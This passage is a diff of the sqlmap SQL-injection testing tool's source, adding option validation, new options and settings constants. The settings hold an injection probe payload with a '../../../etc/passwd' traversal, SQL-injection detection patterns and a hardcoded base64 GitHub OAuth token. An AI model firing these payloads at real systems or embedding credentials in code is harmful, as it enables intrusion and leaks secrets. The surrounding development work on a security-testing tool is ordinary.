errMsg = "sqlmap requires third-party module 'websocket-client' "
|
||||||
|
errMsg += "in order to use WebSocket funcionality"
|
||||||
|
raise SqlmapMissingDependence(errMsg)
|
||||||
|
|
||||||
def _checkTor():
|
def _checkTor():
|
||||||
if not conf.checkTor:
|
if not conf.checkTor:
|
||||||
return
|
return
|
||||||
|
@ -2170,6 +2312,20 @@ def _basicOptionValidation():
|
||||||
errMsg = "option '--regexp' is incompatible with switch '--null-connection'"
|
errMsg = "option '--regexp' is incompatible with switch '--null-connection'"
|
||||||
raise SqlmapSyntaxException(errMsg)
|
raise SqlmapSyntaxException(errMsg)
|
||||||
|
|
||||||
|
if conf.regexp:
|
||||||
|
try:
|
||||||
|
re.compile(conf.regexp)
|
||||||
|
except re.error, ex:
|
||||||
|
errMsg = "invalid regular expression '%s' ('%s')" % (conf.regexp, ex)
|
||||||
|
raise SqlmapSyntaxException(errMsg)
|
||||||
|
|
||||||
|
if conf.crawlExclude:
|
||||||
|
try:
|
||||||
|
re.compile(conf.crawlExclude)
|
||||||
|
except re.error, ex:
|
||||||
|
errMsg = "invalid regular expression '%s' ('%s')" % (conf.crawlExclude, ex)
|
||||||
|
raise SqlmapSyntaxException(errMsg)
|
||||||
|
|
||||||
if conf.dumpTable and conf.dumpAll:
|
if conf.dumpTable and conf.dumpAll:
|
||||||
errMsg = "switch '--dump' is incompatible with switch '--dump-all'"
|
errMsg = "switch '--dump' is incompatible with switch '--dump-all'"
|
||||||
raise SqlmapSyntaxException(errMsg)
|
raise SqlmapSyntaxException(errMsg)
|
||||||
|
@ -2178,7 +2334,7 @@ def _basicOptionValidation():
|
||||||
errMsg = "switch '--predict-output' is incompatible with option '--threads' and switch '-o'"
|
errMsg = "switch '--predict-output' is incompatible with option '--threads' and switch '-o'"
|
||||||
raise SqlmapSyntaxException(errMsg)
|
raise SqlmapSyntaxException(errMsg)
|
||||||
|
|
||||||
if conf.threads > MAX_NUMBER_OF_THREADS:
|
if conf.threads > MAX_NUMBER_OF_THREADS and not conf.get("skipThreadCheck"):
|
||||||
errMsg = "maximum number of used threads is %d avoiding potential connection issues" % MAX_NUMBER_OF_THREADS
|
errMsg = "maximum number of used threads is %d avoiding potential connection issues" % MAX_NUMBER_OF_THREADS
|
||||||
raise SqlmapSyntaxException(errMsg)
|
raise SqlmapSyntaxException(errMsg)
|
||||||
|
|
||||||
|
@ -2186,6 +2342,30 @@ def _basicOptionValidation():
|
||||||
errMsg = "switch '--forms' requires usage of option '-u' ('--url'), '-g', '-m' or '-x'"
|
errMsg = "switch '--forms' requires usage of option '-u' ('--url'), '-g', '-m' or '-x'"
|
||||||
raise SqlmapSyntaxException(errMsg)
|
raise SqlmapSyntaxException(errMsg)
|
||||||
|
|
||||||
|
if conf.crawlExclude and not conf.crawlDepth:
|
||||||
|
errMsg = "option '--crawl-exclude' requires usage of switch '--crawl'"
|
||||||
|
raise SqlmapSyntaxException(errMsg)
|
||||||
|
|
||||||
|
if conf.safePost and not conf.safeUrl:
|
||||||
|
errMsg = "option '--safe-post' requires usage of option '--safe-url'"
|
||||||
|
raise SqlmapSyntaxException(errMsg)
|
||||||
|
|
||||||
|
if conf.safeFreq and not any((conf.safeUrl, conf.safeReqFile)):
|
||||||
|
errMsg = "option '--safe-freq' requires usage of option '--safe-url' or '--safe-req'"
|
||||||
|
raise SqlmapSyntaxException(errMsg)
|
||||||
|
|
||||||
|
if conf.safeReqFile and any((conf.safeUrl, conf.safePost)):
|
||||||
|
errMsg = "option '--safe-req' is incompatible with option '--safe-url' and option '--safe-post'"
|
||||||
|
raise SqlmapSyntaxException(errMsg)
|
||||||
|
|
||||||
|
if conf.csrfUrl and not conf.csrfToken:
|
||||||
|
errMsg = "option '--csrf-url' requires usage of option '--csrf-token'"
|
||||||
|
raise SqlmapSyntaxException(errMsg)
|
||||||
|
|
||||||
|
if conf.csrfToken and conf.threads > 1:
|
||||||
|
errMsg = "option '--csrf-url' is incompatible with option '--threads'"
|
||||||
|
raise SqlmapSyntaxException(errMsg)
|
||||||
|
|
||||||
if conf.requestFile and conf.url and conf.url != DUMMY_URL:
|
if conf.requestFile and conf.url and conf.url != DUMMY_URL:
|
||||||
errMsg = "option '-r' is incompatible with option '-u' ('--url')"
|
errMsg = "option '-r' is incompatible with option '-u' ('--url')"
|
||||||
raise SqlmapSyntaxException(errMsg)
|
raise SqlmapSyntaxException(errMsg)
|
||||||
|
@ -2214,8 +2394,8 @@ def _basicOptionValidation():
|
||||||
errMsg = "switch '--check-tor' requires usage of switch '--tor' (or option '--proxy' with HTTP proxy address using Tor)"
|
errMsg = "switch '--check-tor' requires usage of switch '--tor' (or option '--proxy' with HTTP proxy address using Tor)"
|
||||||
raise SqlmapSyntaxException(errMsg)
|
raise SqlmapSyntaxException(errMsg)
|
||||||
|
|
||||||
if conf.torPort is not None and not (isinstance(conf.torPort, int) and conf.torPort > 0):
|
if conf.torPort is not None and not (isinstance(conf.torPort, int) and conf.torPort >= 0 and conf.torPort <= 65535):
|
||||||
errMsg = "value for option '--tor-port' must be a positive integer"
|
errMsg = "value for option '--tor-port' must be in range 0-65535"
|
||||||
raise SqlmapSyntaxException(errMsg)
|
raise SqlmapSyntaxException(errMsg)
|
||||||
|
|
||||||
if conf.torType not in getPublicTypeMembers(PROXY_TYPE, True):
|
if conf.torType not in getPublicTypeMembers(PROXY_TYPE, True):
|
||||||
|
@ -2280,7 +2460,7 @@ def _resolveCrossReferences():
|
||||||
lib.controller.checks.setVerbosity = setVerbosity
|
lib.controller.checks.setVerbosity = setVerbosity
|
||||||
|
|
||||||
def initOptions(inputOptions=AttribDict(), overrideOptions=False):
|
def initOptions(inputOptions=AttribDict(), overrideOptions=False):
|
||||||
if not inputOptions.disableColoring:
|
if IS_WIN:
|
||||||
coloramainit()
|
coloramainit()
|
||||||
|
|
||||||
_setConfAttributes()
|
_setConfAttributes()
|
||||||
|
@ -2298,8 +2478,10 @@ def init():
|
||||||
_saveCmdline()
|
_saveCmdline()
|
||||||
_setRequestFromFile()
|
_setRequestFromFile()
|
||||||
_cleanupOptions()
|
_cleanupOptions()
|
||||||
|
_dirtyPatches()
|
||||||
_purgeOutput()
|
_purgeOutput()
|
||||||
_checkDependencies()
|
_checkDependencies()
|
||||||
|
_createTemporaryDirectory()
|
||||||
_basicOptionValidation()
|
_basicOptionValidation()
|
||||||
_setProxyList()
|
_setProxyList()
|
||||||
_setTorProxySettings()
|
_setTorProxySettings()
|
||||||
|
@ -2310,6 +2492,7 @@ def init():
|
||||||
_setWafFunctions()
|
_setWafFunctions()
|
||||||
_setTrafficOutputFP()
|
_setTrafficOutputFP()
|
||||||
_resolveCrossReferences()
|
_resolveCrossReferences()
|
||||||
|
_checkWebSocket()
|
||||||
|
|
||||||
parseTargetUrl()
|
parseTargetUrl()
|
||||||
parseTargetDirect()
|
parseTargetDirect()
|
||||||
|
@ -2319,12 +2502,12 @@ def init():
|
||||||
_setHTTPExtraHeaders()
|
_setHTTPExtraHeaders()
|
||||||
_setHTTPCookies()
|
_setHTTPCookies()
|
||||||
_setHTTPReferer()
|
_setHTTPReferer()
|
||||||
|
_setHTTPHost()
|
||||||
_setHTTPUserAgent()
|
_setHTTPUserAgent()
|
||||||
_setHTTPMethod()
|
|
||||||
_setHTTPAuthentication()
|
_setHTTPAuthentication()
|
||||||
_setHTTPProxy()
|
_setHTTPProxy()
|
||||||
_setDNSCache()
|
_setDNSCache()
|
||||||
_setSafeUrl()
|
_setSafeVisit()
|
||||||
_setGoogleDorking()
|
_setGoogleDorking()
|
||||||
_setBulkMultipleTargets()
|
_setBulkMultipleTargets()
|
||||||
_setSitemapTargets()
|
_setSitemapTargets()
|
||||||
|
@ -2340,6 +2523,7 @@ def init():
|
||||||
_setWriteFile()
|
_setWriteFile()
|
||||||
_setMetasploit()
|
_setMetasploit()
|
||||||
_setDBMSAuthentication()
|
_setDBMSAuthentication()
|
||||||
|
loadBoundaries()
|
||||||
loadPayloads()
|
loadPayloads()
|
||||||
_setPrefixSuffix()
|
_setPrefixSuffix()
|
||||||
update()
|
update()
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
@ -23,6 +23,7 @@ optDict = {
|
||||||
},
|
},
|
||||||
|
|
||||||
"Request": {
|
"Request": {
|
||||||
|
"method": "string",
|
||||||
"data": "string",
|
"data": "string",
|
||||||
"paramDel": "string",
|
"paramDel": "string",
|
||||||
"cookie": "string",
|
"cookie": "string",
|
||||||
|
@ -49,9 +50,13 @@ optDict = {
|
||||||
"timeout": "float",
|
"timeout": "float",
|
||||||
"retries": "integer",
|
"retries": "integer",
|
||||||
"rParam": "string",
|
"rParam": "string",
|
||||||
"safUrl": "string",
|
"safeUrl": "string",
|
||||||
"saFreq": "integer",
|
"safePost": "string",
|
||||||
|
"safeReqFile": "string",
|
||||||
|
"safeFreq": "integer",
|
||||||
"skipUrlEncode": "boolean",
|
"skipUrlEncode": "boolean",
|
||||||
|
"csrfToken": "string",
|
||||||
|
"csrfUrl": "string",
|
||||||
"forceSSL": "boolean",
|
"forceSSL": "boolean",
|
||||||
"hpp": "boolean",
|
"hpp": "boolean",
|
||||||
"evalCode": "string",
|
"evalCode": "string",
|
||||||
|
@ -68,6 +73,7 @@ optDict = {
|
||||||
"Injection": {
|
"Injection": {
|
||||||
"testParameter": "string",
|
"testParameter": "string",
|
||||||
"skip": "string",
|
"skip": "string",
|
||||||
|
"skipStatic": "boolean",
|
||||||
"dbms": "string",
|
"dbms": "string",
|
||||||
"dbmsCred": "string",
|
"dbmsCred": "string",
|
||||||
"os": "string",
|
"os": "string",
|
||||||
|
@ -185,6 +191,7 @@ optDict = {
|
||||||
"batch": "boolean",
|
"batch": "boolean",
|
||||||
"charset": "string",
|
"charset": "string",
|
||||||
"crawlDepth": "integer",
|
"crawlDepth": "integer",
|
||||||
|
"crawlExclude": "string",
|
||||||
"csvDel": "string",
|
"csvDel": "string",
|
||||||
"dumpFormat": "string",
|
"dumpFormat": "string",
|
||||||
"eta": "boolean",
|
"eta": "boolean",
|
||||||
|
@ -202,16 +209,15 @@ optDict = {
|
||||||
},
|
},
|
||||||
|
|
||||||
"Miscellaneous": {
|
"Miscellaneous": {
|
||||||
"mnemonics": "string",
|
|
||||||
"alert": "string",
|
"alert": "string",
|
||||||
"answers": "string",
|
"answers": "string",
|
||||||
"beep": "boolean",
|
"beep": "boolean",
|
||||||
"checkWaf": "boolean",
|
|
||||||
"cleanup": "boolean",
|
"cleanup": "boolean",
|
||||||
"dependencies": "boolean",
|
"dependencies": "boolean",
|
||||||
"disableColoring": "boolean",
|
"disableColoring": "boolean",
|
||||||
"googlePage": "integer",
|
"googlePage": "integer",
|
||||||
"mobile": "boolean",
|
"mobile": "boolean",
|
||||||
|
"offline": "boolean",
|
||||||
"pageRank": "boolean",
|
"pageRank": "boolean",
|
||||||
"purgeOutput": "boolean",
|
"purgeOutput": "boolean",
|
||||||
"smart": "boolean",
|
"smart": "boolean",
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
@ -70,7 +70,7 @@ class Replication(object):
|
||||||
try:
|
try:
|
||||||
self.parent.cursor.execute(sql, parameters)
|
self.parent.cursor.execute(sql, parameters)
|
||||||
except sqlite3.OperationalError, ex:
|
except sqlite3.OperationalError, ex:
|
||||||
errMsg = "problem occurred ('%s') while accessing sqlite database " % ex
|
errMsg = "problem occurred ('%s') while accessing sqlite database " % unicode(ex)
|
||||||
errMsg += "located at '%s'. Please make sure that " % self.parent.dbpath
|
errMsg += "located at '%s'. Please make sure that " % self.parent.dbpath
|
||||||
errMsg += "it's not used by some other program"
|
errMsg += "it's not used by some other program"
|
||||||
raise SqlmapGenericException(errMsg)
|
raise SqlmapGenericException(errMsg)
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -1,12 +1,11 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
import os
|
import os
|
||||||
import random
|
|
||||||
import re
|
import re
|
||||||
import subprocess
|
import subprocess
|
||||||
import string
|
import string
|
||||||
|
@ -26,20 +25,23 @@ DESCRIPTION = "automatic SQL injection and database takeover tool"
|
||||||
SITE = "http://sqlmap.org"
|
SITE = "http://sqlmap.org"
|
||||||
ISSUES_PAGE = "https://github.com/sqlmapproject/sqlmap/issues/new"
|
ISSUES_PAGE = "https://github.com/sqlmapproject/sqlmap/issues/new"
|
||||||
GIT_REPOSITORY = "git://github.com/sqlmapproject/sqlmap.git"
|
GIT_REPOSITORY = "git://github.com/sqlmapproject/sqlmap.git"
|
||||||
ML = "sqlmap-users@lists.sourceforge.net"
|
GIT_PAGE = "https://github.com/sqlmapproject/sqlmap"
|
||||||
|
|
||||||
# colorful banner
|
# colorful banner
|
||||||
BANNER = """\033[01;33m _
|
BANNER = """\033[01;33m _
|
||||||
___ ___| |_____ ___ ___ \033[01;37m{\033[01;%dm%s\033[01;37m}\033[01;33m
|
___ ___| |_____ ___ ___ \033[01;37m{\033[01;%dm%s\033[01;37m}\033[01;33m
|
||||||
|_ -| . | | | .'| . |
|
|_ -| . | | | .'| . |
|
||||||
|___|_ |_|_|_|_|__,| _|
|
|___|_ |_|_|_|_|__,| _|
|
||||||
|_| |_| \033[0m\033[4m%s\033[0m\n
|
|_| |_| \033[0m\033[4;37m%s\033[0m\n
|
||||||
""" % ((31 + hash(REVISION) % 6) if REVISION else 30, VERSION_STRING.split('/')[-1], SITE)
|
""" % ((31 + hash(REVISION) % 6) if REVISION else 30, VERSION_STRING.split('/')[-1], SITE)
|
||||||
|
|
||||||
# Minimum distance of ratio from kb.matchRatio to result in True
|
# Minimum distance of ratio from kb.matchRatio to result in True
|
||||||
DIFF_TOLERANCE = 0.05
|
DIFF_TOLERANCE = 0.05
|
||||||
CONSTANT_RATIO = 0.9
|
CONSTANT_RATIO = 0.9
|
||||||
|
|
||||||
|
# Ratio used in heuristic check for WAF/IDS/IPS protected targets
|
||||||
|
IDS_WAF_CHECK_RATIO = 0.5
|
||||||
|
|
||||||
# Lower and upper values for match ratio in case of stable page
|
# Lower and upper values for match ratio in case of stable page
|
||||||
LOWER_RATIO_BOUND = 0.02
|
LOWER_RATIO_BOUND = 0.02
|
||||||
UPPER_RATIO_BOUND = 0.98
|
UPPER_RATIO_BOUND = 0.98
|
||||||
|
@ -47,6 +49,7 @@ UPPER_RATIO_BOUND = 0.98
|
||||||
# Markers for special cases when parameter values contain html encoded characters
|
# Markers for special cases when parameter values contain html encoded characters
|
||||||
PARAMETER_AMP_MARKER = "__AMP__"
|
PARAMETER_AMP_MARKER = "__AMP__"
|
||||||
PARAMETER_SEMICOLON_MARKER = "__SEMICOLON__"
|
PARAMETER_SEMICOLON_MARKER = "__SEMICOLON__"
|
||||||
|
BOUNDARY_BACKSLASH_MARKER = "__BACKSLASH__"
|
||||||
PARTIAL_VALUE_MARKER = "__PARTIAL_VALUE__"
|
PARTIAL_VALUE_MARKER = "__PARTIAL_VALUE__"
|
||||||
PARTIAL_HEX_VALUE_MARKER = "__PARTIAL_HEX_VALUE__"
|
PARTIAL_HEX_VALUE_MARKER = "__PARTIAL_HEX_VALUE__"
|
||||||
URI_QUESTION_MARKER = "__QUESTION_MARK__"
|
URI_QUESTION_MARKER = "__QUESTION_MARK__"
|
||||||
|
@ -78,6 +81,9 @@ TEXT_TAG_REGEX = r"(?si)<(abbr|acronym|b|blockquote|br|center|cite|code|dt|em|fo
|
||||||
# Regular expression used for recognition of IP addresses
|
# Regular expression used for recognition of IP addresses
|
||||||
IP_ADDRESS_REGEX = r"\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b"
|
IP_ADDRESS_REGEX = r"\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b"
|
||||||
|
|
||||||
|
# Regular expression used for recognition of generic "your ip has been blocked" messages
|
||||||
|
BLOCKED_IP_REGEX = r"(?i)(\A|\b)ip\b.*\b(banned|blocked|block list|firewall)"
|
||||||
|
|
||||||
# Dumping characters used in GROUP_CONCAT MySQL technique
|
# Dumping characters used in GROUP_CONCAT MySQL technique
|
||||||
CONCAT_ROW_DELIMITER = ','
|
CONCAT_ROW_DELIMITER = ','
|
||||||
CONCAT_VALUE_DELIMITER = '|'
|
CONCAT_VALUE_DELIMITER = '|'
|
||||||
|
@ -139,10 +145,10 @@ INFERENCE_EQUALS_CHAR = "="
|
||||||
# Character used for operation "not-equals" in inference
|
# Character used for operation "not-equals" in inference
|
||||||
INFERENCE_NOT_EQUALS_CHAR = "!="
|
INFERENCE_NOT_EQUALS_CHAR = "!="
|
||||||
|
|
||||||
# String used for representation of unknown dbms
|
# String used for representation of unknown DBMS
|
||||||
UNKNOWN_DBMS = "Unknown"
|
UNKNOWN_DBMS = "Unknown"
|
||||||
|
|
||||||
# String used for representation of unknown dbms version
|
# String used for representation of unknown DBMS version
|
||||||
UNKNOWN_DBMS_VERSION = "Unknown"
|
UNKNOWN_DBMS_VERSION = "Unknown"
|
||||||
|
|
||||||
# Dynamicity mark length used in dynamicity removal engine
|
# Dynamicity mark length used in dynamicity removal engine
|
||||||
|
@ -201,10 +207,15 @@ DBMS_DIRECTORY_DICT = dict((getattr(DBMS, _), getattr(DBMS_DIRECTORY_NAME, _)) f
|
||||||
SUPPORTED_DBMS = MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES + SQLITE_ALIASES + ACCESS_ALIASES + FIREBIRD_ALIASES + MAXDB_ALIASES + SYBASE_ALIASES + DB2_ALIASES + HSQLDB_ALIASES
|
SUPPORTED_DBMS = MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES + SQLITE_ALIASES + ACCESS_ALIASES + FIREBIRD_ALIASES + MAXDB_ALIASES + SYBASE_ALIASES + DB2_ALIASES + HSQLDB_ALIASES
|
||||||
SUPPORTED_OS = ("linux", "windows")
|
SUPPORTED_OS = ("linux", "windows")
|
||||||
|
|
||||||
|
DBMS_ALIASES = ((DBMS.MSSQL, MSSQL_ALIASES), (DBMS.MYSQL, MYSQL_ALIASES), (DBMS.PGSQL, PGSQL_ALIASES), (DBMS.ORACLE, ORACLE_ALIASES), (DBMS.SQLITE, SQLITE_ALIASES), (DBMS.ACCESS, ACCESS_ALIASES), (DBMS.FIREBIRD, FIREBIRD_ALIASES), (DBMS.MAXDB, MAXDB_ALIASES), (DBMS.SYBASE, SYBASE_ALIASES), (DBMS.DB2, DB2_ALIASES), (DBMS.HSQLDB, HSQLDB_ALIASES))
|
||||||
|
|
||||||
USER_AGENT_ALIASES = ("ua", "useragent", "user-agent")
|
USER_AGENT_ALIASES = ("ua", "useragent", "user-agent")
|
||||||
REFERER_ALIASES = ("ref", "referer", "referrer")
|
REFERER_ALIASES = ("ref", "referer", "referrer")
|
||||||
HOST_ALIASES = ("host",)
|
HOST_ALIASES = ("host",)
|
||||||
|
|
||||||
|
# Names that can't be used to name files on Windows OS
|
||||||
|
WINDOWS_RESERVED_NAMES = ("CON", "PRN", "AUX", "NUL", "COM1", "COM2", "COM3", "COM4", "COM5", "COM6", "COM7", "COM8", "COM9", "LPT1", "LPT2", "LPT3", "LPT4", "LPT5", "LPT6", "LPT7", "LPT8", "LPT9")
|
||||||
|
|
||||||
# Items displayed in basic help (-h) output
|
# Items displayed in basic help (-h) output
|
||||||
BASIC_HELP_ITEMS = (
|
BASIC_HELP_ITEMS = (
|
||||||
"url",
|
"url",
|
||||||
|
@ -237,6 +248,7 @@ BASIC_HELP_ITEMS = (
|
||||||
"checkTor",
|
"checkTor",
|
||||||
"flushSession",
|
"flushSession",
|
||||||
"tor",
|
"tor",
|
||||||
|
"sqlmapShell",
|
||||||
"wizard",
|
"wizard",
|
||||||
)
|
)
|
||||||
|
|
||||||
|
@ -261,7 +273,7 @@ ERROR_PARSING_REGEXES = (
|
||||||
META_CHARSET_REGEX = r'(?si)<head>.*<meta[^>]+charset="?(?P<result>[^"> ]+).*</head>'
|
META_CHARSET_REGEX = r'(?si)<head>.*<meta[^>]+charset="?(?P<result>[^"> ]+).*</head>'
|
||||||
|
|
||||||
# Regular expression used for parsing refresh info from meta html headers
|
# Regular expression used for parsing refresh info from meta html headers
|
||||||
META_REFRESH_REGEX = r'(?si)<head>.*<meta http-equiv="?refresh"?[^>]+content="?[^">]+url=["\']?(?P<result>[^\'">]+).*</head>'
|
META_REFRESH_REGEX = r'(?si)<head>(?!.*?<noscript.*?</head).*?<meta http-equiv="?refresh"?[^>]+content="?[^">]+url=["\']?(?P<result>[^\'">]+).*</head>'
|
||||||
|
|
||||||
# Regular expression used for parsing empty fields in tested form data
|
# Regular expression used for parsing empty fields in tested form data
|
||||||
EMPTY_FORM_FIELDS_REGEX = r'(&|\A)(?P<result>[^=]+=(&|\Z))'
|
EMPTY_FORM_FIELDS_REGEX = r'(&|\A)(?P<result>[^=]+=(&|\Z))'
|
||||||
|
@ -405,7 +417,7 @@ ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
|
||||||
DUMMY_SQL_INJECTION_CHARS = ";()'"
|
DUMMY_SQL_INJECTION_CHARS = ";()'"
|
||||||
|
|
||||||
# Simple check against dummy users
|
# Simple check against dummy users
|
||||||
DUMMY_USER_INJECTION = r"(?i)[^\w](AND|OR)\s+[^\s]+[=><]|\bUNION\b.+\bSELECT\b|\A-\d+\Z"
|
DUMMY_USER_INJECTION = r"(?i)[^\w](AND|OR)\s+[^\s]+[=><]|\bUNION\b.+\bSELECT\b|\bSELECT\b.+\bFROM\b|\b(CONCAT|information_schema|SLEEP|DELAY)\b"
|
||||||
|
|
||||||
# Extensions skipped by crawler
|
# Extensions skipped by crawler
|
||||||
CRAWL_EXCLUDE_EXTENSIONS = ("gif", "jpg", "jpeg", "image", "jar", "tif", "bmp", "war", "ear", "mpg", "mpeg", "wmv", "mpeg", "scm", "iso", "dmp", "dll", "cab", "so", "avi", "mkv", "bin", "iso", "tar", "png", "pdf", "ps", "wav", "mp3", "mp4", "au", "aiff", "aac", "zip", "rar", "7z", "gz", "flv", "mov", "doc", "docx", "xls", "dot", "dotx", "xlt", "xlsx", "ppt", "pps", "pptx")
|
CRAWL_EXCLUDE_EXTENSIONS = ("gif", "jpg", "jpeg", "image", "jar", "tif", "bmp", "war", "ear", "mpg", "mpeg", "wmv", "mpeg", "scm", "iso", "dmp", "dll", "cab", "so", "avi", "mkv", "bin", "iso", "tar", "png", "pdf", "ps", "wav", "mp3", "mp4", "au", "aiff", "aac", "zip", "rar", "7z", "gz", "flv", "mov", "doc", "docx", "xls", "dot", "dotx", "xlt", "xlsx", "ppt", "pps", "pptx")
|
||||||
|
@ -420,7 +432,7 @@ BRUTE_TABLE_EXISTS_TEMPLATE = "EXISTS(SELECT %d FROM %s)"
|
||||||
BRUTE_COLUMN_EXISTS_TEMPLATE = "EXISTS(SELECT %s FROM %s)"
|
BRUTE_COLUMN_EXISTS_TEMPLATE = "EXISTS(SELECT %s FROM %s)"
|
||||||
|
|
||||||
# Payload used for checking of existence of IDS/WAF (dummier the better)
|
# Payload used for checking of existence of IDS/WAF (dummier the better)
|
||||||
IDS_WAF_CHECK_PAYLOAD = "AND 1=1 UNION ALL SELECT 1,2,3,table_name FROM information_schema.tables WHERE 2>1"
|
IDS_WAF_CHECK_PAYLOAD = "AND 1=1 UNION ALL SELECT 1,2,3,table_name FROM information_schema.tables WHERE 2>1-- ../../../etc/passwd"
|
||||||
|
|
||||||
# Vectors used for provoking specific WAF/IDS/IPS behavior(s)
|
# Vectors used for provoking specific WAF/IDS/IPS behavior(s)
|
||||||
WAF_ATTACK_VECTORS = (
|
WAF_ATTACK_VECTORS = (
|
||||||
|
@ -434,8 +446,8 @@ WAF_ATTACK_VECTORS = (
|
||||||
# Used for status representation in dictionary attack phase
|
# Used for status representation in dictionary attack phase
|
||||||
ROTATING_CHARS = ('\\', '|', '|', '/', '-')
|
ROTATING_CHARS = ('\\', '|', '|', '/', '-')
|
||||||
|
|
||||||
# Chunk length (in items) used by BigArray objects (only last chunk and cached one are held in memory)
|
# Approximate chunk length (in bytes) used by BigArray objects (only last chunk and cached one are held in memory)
|
||||||
BIGARRAY_CHUNK_LENGTH = 4096
|
BIGARRAY_CHUNK_SIZE = 1024 * 1024
|
||||||
|
|
||||||
# Only console display last n table rows
|
# Only console display last n table rows
|
||||||
TRIM_STDOUT_DUMP_SIZE = 256
|
TRIM_STDOUT_DUMP_SIZE = 256
|
||||||
|
@ -470,6 +482,9 @@ DEFAULT_COOKIE_DELIMITER = ';'
|
||||||
# Unix timestamp used for forcing cookie expiration when provided with --load-cookies
|
# Unix timestamp used for forcing cookie expiration when provided with --load-cookies
|
||||||
FORCE_COOKIE_EXPIRATION_TIME = "9999999999"
|
FORCE_COOKIE_EXPIRATION_TIME = "9999999999"
|
||||||
|
|
||||||
|
# Github OAuth token used for creating an automatic Issue for unhandled exceptions
|
||||||
|
GITHUB_REPORT_OAUTH_TOKEN = "YzQzM2M2YzgzMDExN2I5ZDMyYjAzNTIzODIwZDA2MDFmMmVjODI1Ng=="
|
||||||
|
|
||||||
# Skip unforced HashDB flush requests below the threshold number of cached items
|
# Skip unforced HashDB flush requests below the threshold number of cached items
|
||||||
HASHDB_FLUSH_THRESHOLD = 32
|
HASHDB_FLUSH_THRESHOLD = 32
|
||||||
|
|
||||||
|
@ -480,7 +495,7 @@ HASHDB_FLUSH_RETRIES = 3
|
||||||
HASHDB_END_TRANSACTION_RETRIES = 3
|
HASHDB_END_TRANSACTION_RETRIES = 3
|
||||||
|
|
||||||
# Unique milestone value used for forced deprecation of old HashDB values (e.g. when changing hash/pickle mechanism)
|
# Unique milestone value used for forced deprecation of old HashDB values (e.g. when changing hash/pickle mechanism)
|
||||||
HASHDB_MILESTONE_VALUE = "nXkbwIURlN" # rd74b803 "".join(random.sample(string.ascii_letters, 10))
|
HASHDB_MILESTONE_VALUE = "JHjrBugdDA" # "".join(random.sample(string.ascii_letters, 10))
|
||||||
|
|
||||||
# Warn user of possible delay due to large page dump in full UNION query injections
|
# Warn user of possible delay due to large page dump in full UNION query injections
|
||||||
LARGE_OUTPUT_THRESHOLD = 1024 ** 2
|
LARGE_OUTPUT_THRESHOLD = 1024 ** 2
|
||||||
|
@ -504,7 +519,10 @@ MAX_DNS_LABEL = 63
|
||||||
DNS_BOUNDARIES_ALPHABET = re.sub("[a-fA-F]", "", string.ascii_letters)
|
DNS_BOUNDARIES_ALPHABET = re.sub("[a-fA-F]", "", string.ascii_letters)
|
||||||
|
|
||||||
# Alphabet used for heuristic checks
|
# Alphabet used for heuristic checks
|
||||||
HEURISTIC_CHECK_ALPHABET = ('"', '\'', ')', '(', '[', ']', ',', '.')
|
HEURISTIC_CHECK_ALPHABET = ('"', '\'', ')', '(', ',', '.')
|
||||||
|
|
||||||
|
